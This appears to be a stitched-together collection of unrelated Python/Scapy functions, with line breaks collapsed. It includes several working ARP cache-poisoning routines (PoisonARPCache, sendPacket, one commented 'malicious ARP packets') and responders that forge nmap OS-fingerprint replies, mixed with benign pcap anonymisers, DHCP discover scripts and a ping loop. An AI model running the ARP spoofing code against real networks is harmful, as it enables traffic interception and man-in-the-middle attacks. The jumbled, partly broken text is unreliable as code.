def PoisonARPCache(): # Constructing packet for Victim A frameA = Ether() frameA.src = ATTACKER_MAC frameA.dst = VICTIM_A_MAC arpA = ARP() arpA.hwsrc = ATTACKER_MAC arpA.psrc = VICTIM_B_IP arpA.pdst = VICTIM_A_IP arpA.op = 1 # Constructing packet for Victim B frameB = Ether() frameB.src = ATTACKER_MAC frameB.dst = VICTIM_B_MAC arpB = ARP() arpB.hwsrc = ATTACKER_MAC arpB.psrc = VICTIM_A_IP arpB.pdst = VICTIM_B_IP arpB.op = 1 packetA = frameA/arpA packetB = frameB/arpB while True: sendp(packetA) sendp(packetB) sleep(5)
def service_craft(pkt, fp, mac, service, type_=False): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.ttl, 16) ip.flags = 0x4000 tcp = TCP() tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport if type_: tcp.flags = 0x018 # PSH / ACK tcp.seq = pkt[TCP].seq tcp.ack = pkt[TCP].ack data = service[pkt[TCP].dport] fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data return fin_pkt else: tcp.flags = 0x012 # SYN / ACK tcp.seq = pkt[TCP].seq tcp.ack = pkt[TCP].seq + 1 fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def Ether_layer(attributes): layer2 = Ether() layer2.dst = attributes['dst'] layer2.src = attributes['src'] layer2.type = attributes['type'] return layer2
def seqgen_pkt_craft(pkt, fp, mac, pno): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['T1']['TTL'], 16) ip.flags = fp.probe['T1']['DF'] ip.id = fp.ip_id_gen() tcp = TCP() s_val = fp.probe['T1']['S'] if s_val == 'Z': tcp.seq = 0 elif s_val == 'A': tcp.seq = pkt[TCP].ack elif s_val == 'A+': tcp.seq = pkt[TCP].ack + 1 else: tcp.seq = fp.tcp_seq_gen() a_val = fp.probe['T1']['A'] if a_val == 'Z': tcp.ack = 0 elif a_val == 'S': tcp.ack = pkt[TCP].seq elif a_val == 'S+': tcp.ack = pkt[TCP].seq + 1 else: tcp.ack = pkt[TCP].seq + 369 flag_val = fp.probe['T1']['F'] tcp.flags = flag_val tcp.window = fp.probe['WIN']['W' + pno] tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport tcp.options = fp.probe['OPS']['O' + pno] rd_val = fp.probe['T1']['RD'] if rd_val != '0': crc = int(rd_val, 16) data = b'TCP Port is closed\x00' data += compensate(data, crc) fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data else: fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def inject_packet(self, iface, dst_mac): ether_part = Ether(src='00:00:00:00:00:00', dst=dst_mac) ip_part = IP(ttl=1, src='0.0.0.0', dst='224.0.0.1') igmp_part = IGMP(type=0x11) igmp_part.mrtime = (self.max_resp_time / 100) & 0xff igmp_part.igmpize(ether=ether_part, ip=ip_part) # Make this IGMP query packet as an unicast packet ether_part.dst = dst_mac sendp(ether_part / ip_part / igmp_part, iface=iface, verbose=False)
def sanitize(filepath_in, filepath_out=None, sequential=True, ipv4_mask=0, ipv6_mask=0, mac_mask=0, start_ipv4='10.0.0.1', start_ipv6='2001:aa::1', start_mac='00:aa:00:00:00:00'): if not filepath_out: timestamp = datetime.datetime.now().strftime('%y%m%d-%H%m%S') filepath_out = os.path.splitext(filepath_in)[ 0] + '_sanitized_' + timestamp + os.path.splitext(filepath_in)[1] mac_gen = MACGenerator(sequential=sequential, mask=mac_mask, start_mac=start_mac) ip4_gen = IPv4Generator(sequential=sequential, mask=ipv4_mask, start_ip=start_ipv4) ip6_gen = IPv6Generator(sequential=sequential, mask=ipv6_mask, start_ip=start_ipv6) with open(filepath_in) as capfile: #open cap file with pcapfile cap = savefile.load_savefile(capfile, verbose=False) #use scapy's pcapwriter pktwriter = PcapWriter(filepath_out, append=True) try: for pkt in cap.packets: #create scapy packet from pcapfile packet raw output pkt = Ether(pkt.raw()) #MAC addresses pkt.src = mac_gen.get_mac(pkt.src) pkt.dst = mac_gen.get_mac(pkt.dst) #IP Address try: pkt['IP'].src = ip4_gen.get_ip(pkt['IP'].src) pkt['IP'].dst = ip4_gen.get_ip(pkt['IP'].dst) except IndexError: pkt['IPv6'].src = ip6_gen.get_ip(pkt['IPv6'].src) pkt['IPv6'].dst = ip6_gen.get_ip(pkt['IPv6'].dst) pktwriter.write(pkt) finally: pktwriter.close() return filepath_out.split('/')[-1]
def udp_craft(pkt, mac, fp): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['U1']['TTL'], 16) ip.flags = fp.probe['U1']['DF'] ip.len = 56 ip.id = 4162 icmp = ICMP() icmp.type = 3 icmp.unused = 0 icmp.code = 13 # code 3 for reply iperror = IPerror() iperror.proto = 'udp' iperror.ttl = 0x3E iperror.len = fp.probe['U1']['RIPL'] iperror.id = fp.probe['U1']['RID'] ripck_val = fp.probe['U1']['RIPCK'] if ripck_val == 'G': pass elif ripck_val == 'Z': iperror.chksum = 0 else: iperror.chksum = pkt[IP].chksum udperror = UDPerror() udperror.sport = pkt[UDP].sport udperror.dport = pkt[UDP].dport udperror.len = pkt[UDP].len if fp.probe['U1']['RUCK'] == 'G': udperror.chksum = pkt[UDP].chksum else: udperror.chksum = fp.probe['U1']['RUCK'] try: ipl = int(fp.probe['U1']['IPL'], 16) except KeyError: ipl = None data = pkt[Raw].load fin_pkt = ip / icmp / iperror / udperror / data if ether is None else ether / ip / icmp / iperror / udperror / data return fin_pkt
def sanitize( filepath_in, filepath_out=None, sequential=True, ipv4_mask=0, ipv6_mask=0, mac_mask=0, start_ipv4="10.0.0.1", start_ipv6="2001:aa::1", start_mac="00:aa:00:00:00:00", ): if not filepath_out: timestamp = datetime.datetime.now().strftime("%y%m%d-%H%m%S") filepath_out = os.path.splitext(filepath_in)[0] + "_sanitized_" + timestamp + os.path.splitext(filepath_in)[1] mac_gen = MACGenerator(sequential=sequential, mask=mac_mask, start_mac=start_mac) ip4_gen = IPv4Generator(sequential=sequential, mask=ipv4_mask, start_ip=start_ipv4) ip6_gen = IPv6Generator(sequential=sequential, mask=ipv6_mask, start_ip=start_ipv6) with open(filepath_in) as capfile: # open cap file with pcapfile cap = savefile.load_savefile(capfile, verbose=False) # use scapy's pcapwriter pktwriter = PcapWriter(filepath_out, append=True) try: for pkt in cap.packets: # create scapy packet from pcapfile packet raw output pkt = Ether(pkt.raw()) # MAC addresses pkt.src = mac_gen.get_mac(pkt.src) pkt.dst = mac_gen.get_mac(pkt.dst) # IP Address try: pkt["IP"].src = ip4_gen.get_ip(pkt["IP"].src) pkt["IP"].dst = ip4_gen.get_ip(pkt["IP"].dst) except IndexError: pkt["IPv6"].src = ip6_gen.get_ip(pkt["IPv6"].src) pkt["IPv6"].dst = ip6_gen.get_ip(pkt["IPv6"].dst) pktwriter.write(pkt) finally: pktwriter.close() return filepath_out.split("/")[-1]
def ecn_craft(pkt, mac, fp): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['ECN']['TTL'], 16) ip_flag = fp.probe['ECN']['DF'] if ip_flag == 'Y': ip.flags = 2 else: ip.flags = 0 ip.id = fp.ip_id_gen() tcp = TCP() w_val = fp.probe['ECN']['W'] if w_val == 'ECHOED': tcp.window = pkt[TCP].window else: tcp.window = w_val tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport cc_val = fp.probe['ECN']['CC'] if cc_val == 'Y': tcp.flags = 0x52 elif cc_val == 'N': tcp.flags = 0x12 elif cc_val == 'S': tcp.flags = 0xD2 else: tcp.flags = 0x10 o_val = fp.probe['ECN']['O'] if o_val == 'EMPTY': pass else: tcp.options = o_val fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def recv_resp_poke(i: int) -> None: with configure_eth_if() as so: so.settimeout(10) try: eth_frame = Ether(so.recv(60)) if eth_frame.type == 0x2222 and eth_frame.load[0] == 0xfa: if eth_frame.load[1] != i: raise Exception('Missed Poke Packet') eth_frame.dst = eth_frame.src eth_frame.src = so.getsockname()[4] eth_frame.load = bytes.fromhex('fb') # POKE_RESP code so.send(raw(eth_frame)) except Exception as e: raise e
def sendPackets(gateway_ip, target_ip, this_mac_address, target_mac_address): arp = ARP() arp.psrc = gateway_ip arp.hwsrc = this_mac_address arp = arp arp.pdst = target_ip # (say IP address of target machine) arp.hwdst = target_mac_address # target mac ether = Ether() ether.src = this_mac_address ether.dst = target_mac_address arp.op = 2 def broadcast(): packet = ether / arp sendp(x=packet, verbose=True) broadcast()
def icmp_craft(pkt, fp, mac): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['IE']['TTL'], 16) dfi_flag = fp.probe['IE']['DFI'] if dfi_flag == 'N': ip.flags = 0 elif dfi_flag == 'S': ip.flags = pkt[IP].flags elif dfi_flag == 'Y': ip.flags = 2 else: ip.flags = 0 if pkt[IP].flags == 2 else 2 ip.id = fp.ip_id_icmp_gen() icmp = ICMP() icmp.type = 0 icmp.id = pkt[ICMP].id cd_val = fp.probe['IE']['CD'] if cd_val == 'Z': icmp.code = 0 elif cd_val == 'S': icmp.code = pkt[ICMP].code else: icmp.code = random.randint(0, 15) icmp.seq = pkt[ICMP].seq data = pkt[ICMP].payload fin_pkt = ip / icmp / data if ether is None else ether / ip / icmp / data return fin_pkt
def sendPacket(my_mac, gateway_ip, target_ip, target_mac): ether = Ether() ether.src = my_mac arp = ARP() arp.psrc = gateway_ip arp.hwsrc = my_mac arp = arp arp.pdst = target_ip arp.hwdst = target_mac ether = ether ether.src = my_mac ether.dst = target_mac arp.op = 2 def broadcastPacket(): packet = ether / arp sendp(x=packet, verbose=False) broadcastPacket()
def sendPacket(my_mac, gateway_ip, target_ip, target_mac): # Function for sending the malicious ARP packets out with the specified data ether = Ether() ether.src = my_mac arp = ARP() arp.psrc = gateway_ip arp.hwsrc = my_mac arp = arp arp.pdst = target_ip arp.hwdst = target_mac ether = ether ether.src = my_mac ether.dst = target_mac arp.op = 2 packet = ether / arp sendp(x=packet, verbose=False)
''' Sample script to send a DHCP discover ''' import scapy from scapy.sendrecv import sendp, sniff from scapy.all import DHCP, ARP, BOOTP, Ether, UDP, TCP, IP # data link layer ethernet = Ether() ethernet.dst = 'ff:ff:ff:ff:ff:ff' # network layer ip = IP() ip.dst = '255.255.255.255' # transport layer udp = UDP() udp.sport = 68 udp.dport = 67 # application layer bootp = BOOTP() bootp.flags = 1 dhcp = DHCP() dhcp.options = [("message-type", "discover"), "end"] packet = ethernet / ip / udp / bootp / dhcp ans = srp1(packet)
def t2tot7_craft(pkt, fp, mac, tno): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe[tno]['TTL'], 16) ip.flags = fp.probe[tno]['DF'] ip.id = random.randint(1, 1000) tcp = TCP() s_val = fp.probe[tno]['S'] if s_val == 'Z': tcp.seq = 0 elif s_val == 'A': tcp.seq = pkt[TCP].ack elif s_val == 'A+': tcp.seq = pkt[TCP].ack + 1 else: tcp.seq = pkt[TCP].ack + 369 a_val = fp.probe[tno]['A'] if a_val == 'Z': tcp.ack = 0 elif a_val == 'S': tcp.ack = pkt[TCP].seq elif a_val == 'S+': tcp.ack = pkt[TCP].seq + 1 else: tcp.ack = pkt[TCP].seq + 369 flag_val = fp.probe[tno]['F'] tcp.flags = flag_val w_val = fp.probe[tno]['W'] if w_val == 'ECHOED': tcp.window = pkt[TCP].window else: tcp.window = w_val tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport o_val = fp.probe[tno]['O'] if o_val == 'EMPTY': pass else: tcp.options = o_val rd_val = fp.probe[tno]['RD'] if rd_val != '0': crc = int(rd_val, 16) data = b'TCP Port is closed\x00' data += compensate(data, crc) fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data else: fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
assert len(sys.argv) == 8 #*** Get parameters from command line SRC_MAC = sys.argv[1] DST_MAC = sys.argv[2] SRC_IP = sys.argv[3] DST_IP = sys.argv[4] IF_NAME = sys.argv[5] REPEAT_INTERVAL = float(sys.argv[6]) REPEAT_COUNT = int(sys.argv[7]) data = "blahblahblah" # define ip and icmp eth = Ether() eth.src=SRC_MAC eth.dst=DST_MAC ip = IP() ip.src = SRC_IP ip.dst = DST_IP icmp = ICMP() icmp.type = 8 icmp.code = 0 finished = 0 count = 0 while not finished: sendp(eth/ip/icmp/data, iface=IF_NAME) time.sleep(REPEAT_INTERVAL) count += 1 if count >= REPEAT_COUNT: finished = 1
""" A very basic script to send a DHCP Discover message. Capture the packages to see what's wrong. """ import scapy from scapy.sendrecv import sendp, sniff from scapy.all import DHCP, ARP, BOOTP, Ether, UDP, TCP, IP # data link layer ethernet = Ether() ethernet.show() ethernet.dst = "ff:ff:ff:ff:ff:ff" # network layer ip = IP() ip.show() ip.dst = "255.255.255.255" # transport layer udp = UDP() udp.show() udp.sport = 68 udp.dport = 67 # application layer bootp = BOOTP() bootp.show() bootp.flags = 1 dhcp = DHCP() dhcp.show()
def sanitize(filepath_in, filepath_out=None, sequential=True, ipv4_mask=0, ipv6_mask=0, mac_mask=0, start_ipv4='10.0.0.1', start_ipv6='2001:aa::1', start_mac='00:aa:00:00:00:01', info=True): if not filepath_out: timestamp = datetime.datetime.now().strftime('%y%m%d-%H%m%S') filepath_out = os.path.splitext(filepath_in)[ 0] + '_sanitized_' + timestamp + os.path.splitext(filepath_in)[1] mac_gen = MACGenerator(sequential=sequential, mask=mac_mask, start_mac=start_mac) ip4_gen = IPv4Generator(sequential=sequential, mask=ipv4_mask, start_ip=start_ipv4) ip6_gen = IPv6Generator(sequential=sequential, mask=ipv6_mask, start_ip=start_ipv6) with open(filepath_in) as capfile: #open cap file with pcapfile cap = savefile.load_savefile(capfile, verbose=False) #use scapy's pcapwriter pktwriter = PcapWriter(filepath_out, append=True) try: for pkt in cap.packets: #create scapy packet from pcapfile packet raw output new_pkt = Ether(pkt.raw()) #MAC addresses try: new_pkt.src = mac_gen.get_mac(new_pkt.src) new_pkt.dst = mac_gen.get_mac(new_pkt.dst) except: pass #IP Addresses try: new_pkt['IP'].src = ip4_gen.get_ip(new_pkt['IP'].src) new_pkt['IP'].dst = ip4_gen.get_ip(new_pkt['IP'].dst) except IndexError: pass try: new_pkt['IPv6'].src = ip6_gen.get_ip(new_pkt['IPv6'].src) new_pkt['IPv6'].dst = ip6_gen.get_ip(new_pkt['IPv6'].dst) except IndexError: pass #sanitize ARP addresses try: new_pkt['ARP'].hwsrc = mac_gen.get_mac( new_pkt['ARP'].hwsrc) new_pkt['ARP'].hwdst = mac_gen.get_mac( new_pkt['ARP'].hwdst) new_pkt['ARP'].psrc = ip4_gen.get_ip(new_pkt['ARP'].psrc) new_pkt['ARP'].pdst = ip4_gen.get_ip(new_pkt['ARP'].pdst) except IndexError: pass #fix checksum in each layer, starting at the top layer for layer in range(12, 0, -1): try: del new_pkt[layer].chksum except: pass pktwriter.write(new_pkt) finally: pktwriter.close() if info: print 'This file has %s IPv4/IPv6 endpoints and %s MAC endpoints' % ( len(ip4_gen.mappings) + len(ip6_gen.mappings), len( mac_gen.mappings)) print 'File created: %s' % filepath_out